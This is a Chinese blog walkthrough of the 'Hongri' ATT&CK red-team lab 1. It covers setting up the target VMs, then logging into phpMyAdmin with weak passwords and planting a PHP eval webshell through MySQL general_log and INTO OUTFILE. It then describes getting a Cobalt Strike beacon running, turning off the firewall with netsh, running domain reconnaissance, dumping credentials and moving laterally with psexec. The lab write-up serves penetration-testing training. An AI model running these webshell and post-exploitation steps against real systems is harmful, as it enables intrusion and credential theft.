ATT&CK实战系列(一)红日靶场1

 

环境下载

 

 

下载靶场环境,并导入虚拟机
分别是win2003、win7、winserver2008

配置网络

虚拟机——编辑——虚拟机网络编辑器——添加网络VMnet2——仅主机模式
分配的地址是192.168.52.0

配置好地址后,需要将win2003和winserver2008的网卡设置为VMnet2

win7的网络需要两张,一张为VMnet2,一张为NAT(我这用的是台式机搭建靶场,笔记本作为攻击机,所以用的桥接网络)

**总结:win7为web服务器双网卡,通外网。win2003和2008为域内服务器。**
win7:192.168.0.105、192.168.52.143
win2003:192.168.52.138
win2008:192.168.52.141

外网渗透

1、已知目标的外网是192.168.0.105
2、扫描ip的端口,获得80和3306端口。

3、访问80端口
获得phpstudy探针,获得绝对路径,探测出数据库弱口令

 4、扫描192.168.0.105的目录

获得phpmyadmin目录

5、访问phpmyadmin
通过弱口令登录

6、通过日志写入webshell
SHOW VARIABLES LIKE '%general%' #查看日志

set global general_log = "ON" #开启日志记录

set global general_log_file = "D:/phpStudy/WWW/shell.php" #指定日志文件

select "<?php eval($_POST['123'])?>"; #写入webshell

访问webshell

使用蚁剑连接木马

7、phpmyadmin的getshell方法

(1)Select into Outfile:这种方法涉及使用“SELECT … INTO OUTFILE”SQL语句将webshell写入服务器上的文件。攻击者必须知道webroot的绝对路径并具有对该目录的写权限。
show global variables like '%secure%' #root权限、绝对路径、secure_file_priv没具体值
       如果secure_file_priv的值为null,表示限制mysqld不允许导入或导出
       如果secure_file_priv的值为某个具体的目录路径(例如/tmp/),表示限制mysqld的导入或导出只能发生在该目录下
       如果secure_file_priv没有具体值,表示不对mysqld的导入或导出做限制
在MySQL 5.5之前,secure_file_priv默认是空,这个情况下可以向任意绝对路径写文件。但在MySQL 5.5之后,secure_file_priv默认是NULL,这个情况下不可以写文件

(2)日志文件操作:这种方法涉及操作MySQL日志文件以将webshell写入服务器上的文件。攻击者必须具有对日志文件目录的写权限并知道webroot的绝对路径
        SHOW VARIABLES LIKE '%general%' #查看日志
        set global general_log = "ON" #开启日志记录
        set global general_log_file = "D:/phpStudy/WWW/shell.php" #指定日志文件
        select "<?php eval($_POST['aaa']);?>"; #写入webshell

以上所有方法都需要满足某些条件,例如具有写权限并知道webroot的绝对路径

内网渗透

1、打开CS,生成监听器

2、创建木马程序,将目标上线cs

3、通过蚁剑将cs创建的木马上传

4、启动木马,上线cs

5、主机上线后

netsh advfirewall set allprofiles state off #关闭目标主机防火墙

ipconfig #查看信息,发现双网卡

net user #查看用户

提权

net view #查看计算机列表,并且会将其他计算机列入CS

net config Workstation #查看当前计算机名、域、登录域等

net view /domain #查看域

net localgruop administrators #查看域管

net tasklist #查看进程列表,是否存在杀软

net dclist #查看域控列表

提取凭证

 

 

提取明文密码

 

创建smb监听器

 

psexec

 

选择账号密码,监听器选择创建的smb,会话选择内网提权后的服务器

 

获得一台服务器的权限后,再次获得另一个内网服务器的权限并上线

 

 

新网站

phpmyadmin中看到有特殊的数据库,并且在蚁剑也看到不同的目录

 

获得新网站

 

公告信息获得敏感信息

 

打开后台弱口令登录

 

 

通过新建文件上传木马

 

 

在蚁剑获取到上传的目录

 

访问木马

 

连接木马

 



posted @   奕泽Yiz  阅读(9)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· DeepSeek “源神”启动!「GitHub 热点速览」
· 我与微信审核的“相爱相杀”看个人小程序副业
· 微软正式发布.NET 10 Preview 1:开启下一代开发框架新篇章
· C# 集成 DeepSeek 模型实现 AI 私有化(本地部署与 API 调用教程)
· spring官宣接入deepseek,真的太香了~
点击右上角即可分享
微信分享提示